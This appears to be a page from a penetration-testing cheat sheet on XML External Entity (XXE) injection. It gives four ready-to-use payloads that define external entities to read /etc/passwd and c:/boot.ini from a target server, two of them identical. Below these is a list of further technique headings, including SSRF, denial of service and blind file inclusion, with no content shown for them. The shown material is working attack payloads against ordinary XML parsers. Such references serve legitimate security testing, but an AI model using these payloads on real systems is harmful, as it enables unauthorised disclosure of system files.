Page cover

XML External Entity (XXE) Injection Payloads

  • XXE : Classic XXE

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>

<?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>

  • XXE: Basic XML Example

  • XXE: Entity Example

  • XXE: File Disclosure

  • XXE: Denial-of-Service Example

  • XXE: Local File Inclusion Example

  • XXE: Blind Local File Inclusion Example (When first case doesn't return anything.)

  • XXE: Access Control Bypass (Loading Restricted Resources - PHP example)

  • XXE:SSRF ( Server Side Request Forgery ) Example

  • XXE: (Remote Attack - Through External Xml Inclusion) Exmaple

  • XXE: UTF-7 Exmaple

  • XXE: Base64 Encoded

  • XXE: XXE inside SOAP Example

  • XXE: XXE inside SVG

PreviousGENERAL INFORMATIONNextPost exploitation techniques

Last updated